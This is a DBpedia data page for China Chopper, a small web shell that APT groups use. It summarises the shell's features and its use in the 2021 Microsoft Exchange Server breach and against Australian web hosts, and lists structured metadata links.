China Chopper (original) (raw)

About DBpedia

China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server.

Property Value
dbo:abstract China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server. China Chopper has many commands and control features such as a password brute-force attack option, code obfuscation, file and database management and a graphical user interface. It originally was distributed from a website www.maicaidao.com which is now down. FireEye revealed that the client of this web shell is programmed in Microsoft Visual C++ 6.0 China Chopper was used in attacks against eight Australian web hosting providers which were compromised due to their use of an unsupported operating system (Windows Server 2008). Hackers connected the web servers to a Monero mining pool, by which they mined about 3868 AUD worth of Monero. In 2021, a version of the web shell programmed in JScript was used by Advanced Persistent Threat group Hafnium to exploit four zero-day vulnerabilities in Microsoft Exchange Server, in the 2021 Microsoft Exchange Server data breach. This web shell was dropped when one of these vulnerabilities was exploited, allowing attackers to upload a program which ran with administrator privileges. With only the address of the .aspx file containing the script, a HTTP POST request could be made to the script with just a command in the request, causing the script to execute the command immediately using the JScript 'eval' function, allowing attackers to run arbitrary code on the server. (en)
dbo:wikiPageID 60187326 (xsd:integer)
dbo:wikiPageLength 4738 (xsd:nonNegativeInteger)
dbo:wikiPageRevisionID 1113654408 (xsd:integer)
dbo:wikiPageWikiLink dbr:Obfuscation_(software) dbr:Monero_(cryptocurrency) dbr:Hafnium_(group) dbr:Brute-force_attack dbr:Web_server dbr:Windows_Server_2008 dbr:Hacker dbr:2021_Microsoft_Exchange_Server_data_breach dbr:ASP.NET dbr:Database dbr:FireEye dbr:Graphical_user_interface dbr:Kilobyte dbr:POST_(HTTP) dbr:Privilege_(computing) dbr:JScript dbc:Web_security_exploits dbr:Advanced_persistent_threat dbc:Web_shells dbr:Microsoft_Exchange_Server dbr:Microsoft_Visual_C++ dbr:Mining_pool dbr:Web_hosting_service dbr:Web_shell dbr:Executable dbr:Zero-day_(computing)
dbp:wikiPageUsesTemplate dbt:Reflist dbt:Short_description dbt:Computer-security-stub
dcterms:subject dbc:Web_security_exploits dbc:Web_shells
rdfs:comment China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server. (en)
rdfs:label China Chopper (en)
owl:sameAs wikidata:China Chopper https://global.dbpedia.org/id/9zWxr
prov:wasDerivedFrom wikipedia-en:China_Chopper?oldid=1113654408&ns=0
foaf:isPrimaryTopicOf wikipedia-en:China_Chopper
is dbo:wikiPageWikiLink of dbr:Hafnium_(group) dbr:2021_Microsoft_Exchange_Server_data_breach dbr:Web_shell
is foaf:primaryTopic of wikipedia-en:China_Chopper